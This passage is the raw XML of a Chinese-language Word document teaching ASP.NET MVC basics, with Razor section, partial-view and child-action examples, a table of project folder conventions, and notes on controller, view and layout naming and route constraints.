          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>="~/Content/bootstrap.min.css"</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rel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>="stylesheet"</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type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>="text/css"</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script</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src</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>="~/Scripts/modernizr-2.6.2.js"&gt;&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>script</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head</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body</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这是分段视图:</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RenderSection(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="A31515"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"Header"</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这是分段视图:</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RenderSection(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="A31515"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"Body"</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这是分段视图:</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RenderSection(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="A31515"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"Footer"</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使用可选分段，这样即使不存在这个分段，系统也不会报错哦</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RenderSection(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="A31515"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"Footer2"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>false</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body</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="300" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>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html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="300" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>分部视图的Demo，GetParial.cshtml:</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Layout = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>null</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!DOCTYPE</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html</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html</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head</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meta</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name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>="viewport"</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content</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>="width=device-width"</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title</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GetParital</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title</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head</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body</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This is GetPartial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Html.Partial(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="A31515"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"MyPartial"</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body</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>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html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MyParital.cshtml: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this is the message from the partial view</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a</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href</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>="GetSection"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>GetSection</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a</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pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>子动作的Demo，HomeController.cs:</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808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>///</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>&lt;summary&gt;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808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>///</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> 调用子动作</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808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>///</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>&lt;/summary&gt;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808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>///</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>&lt;returns&gt;&lt;/returns&gt;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public</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> ActionResult GetChildAction()</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return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> View();</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[ChildActionOnly]</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public</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> ActionResult Time()</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return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> PartialView(DateTime.Now);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>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pStyle w:val="37"/>
        <w:rPr>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>GetChildAction.cshtml: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Layout = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>null</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!DOCTYPE</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html</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html</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head</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meta</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name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>="viewport"</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content</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>="width=device-width"</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title</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GetStrongResult</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title</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head</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body</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This is GetChildAction</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Html.Action(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="A31515"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"Time"</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body</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>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html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Time.cshtml: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 xml:space="preserve">@model </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>DateTime?</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p</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 xml:space="preserve">the time is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Model.ToShortTimeString()</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p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>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MVC项目综述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>项目结构约定</w:t>
      </w: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4886"/>
        <w:gridCol w:w="3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文件夹及文件</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描述</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/App_Data</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此文件用于放置私有数据，如XML文件，或使用SQL Server Express，SQLite的数据库文件，或其他文件的存储库</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IIS不将此文件夹的内容进行服务(意即无法通过Web来请求该目录文件)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 xml:space="preserve">/App_start </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此文件夹包含项目的一些核心配置，包括路由和过滤器的定义，以及一些内容包</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3561" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="23"/>
              <w:spacing w:line="300" w:lineRule="exact"/>
              <w:rPr>
                <w:rFonts w:cs="新宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>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/Areas</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区域是把一个大型应用程序划分为较小片段的方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3561" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="23"/>
              <w:spacing w:line="300" w:lineRule="exact"/>
              <w:rPr>
                <w:rFonts w:cs="新宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>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/bin</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为MVC应用程序编译好的程序集放在这里，连同任何被引用的包括不在GAC中的引用程序集</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IIS不将此从文件夹的内容进行服务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/Content</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用于放置静态内容，如CSS和图片等</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这是一个约定但不是必须的，你可以把静态内容放在任何适合自己的地方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/Controllers</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用于放置控制器类</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这是一个约定，可以把控制器放在任何地方，因为它们都会被编译到同一个程序集中。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/Models</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用于放置视图模型和域模型类，除非是最简单的应用程序，否则都能够获益于一个专用的定义域模型的程序集</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这是一个约定，可以把模型放在任何地方。或是一个单独的程序集。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/Scripts</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本目录意在保存应用程序的JavaScript库</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这是一个约定，你可以把脚本放在任何位置，因为它们实际上是另一种类型的静态内容。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/Views</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保存视图和分部视图，通常按它们的控制器命名的文件夹进行分组</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/Views/Web.config文件阻止IIS对这些目录的直接访问。视图必须通过动作方法来访问。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/Views/Shared</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本目录保存布局，以及不专用于个别控制器的视图</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3561" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="23"/>
              <w:spacing w:line="300" w:lineRule="exact"/>
              <w:rPr>
                <w:rFonts w:cs="新宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>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/Views/Web.config</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pPr>
              <w:pStyle w:val="23"/>
              <w:spacing w:line="300" w:lineRule="exact"/>
              <w:rPr>
                <w:rFonts w:cs="新宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>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/Global.asax</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Global.asax文件在MVC应用程序中的作用与其在WebForm应用程序中作用相同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/Web.config</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这是应用程序配置文件</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与WebForm作用相同</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="300" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:cs="新宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>约定优于配置</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>约定优于配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>的含义为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>你不需要明确地配置控制器与其视图之间的关联，只要遵循某种命名约定，一切都会正常工作。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>遵循控制器约定</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>控制器类名必须以“Controller”结尾，如HomeController</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>遵循视图约定</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>视图及分部视图放在/Views/ControllerName文件夹中。例如，一个与ProductController相关联的视图应该放在/Views/Product文件夹中。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>MVC框架期望，一个动作方法的默认视图应当按照这个方法进行命名。例如：名为List动作方法相关联的视图应该是 “List.cshtml”。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>遵循布局约定</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>对于布局的约定是，以下划线(_)字符作为文件名前缀，而且布局文件应该放在/Views/Shared文件夹中。默认情况下，会通过/Views/_ViewStart.cshtml文件将这个布局应用与所有的视图。如果不想把默认布局用于视图，可以修改_ViewStart.cshtml中的设置，或者将Layout设置为null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="300" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:cs="新宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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URL路由</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="46"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>路由约束</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rStyle w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>用正则表达式约束路由</w:t>
      </w:r>
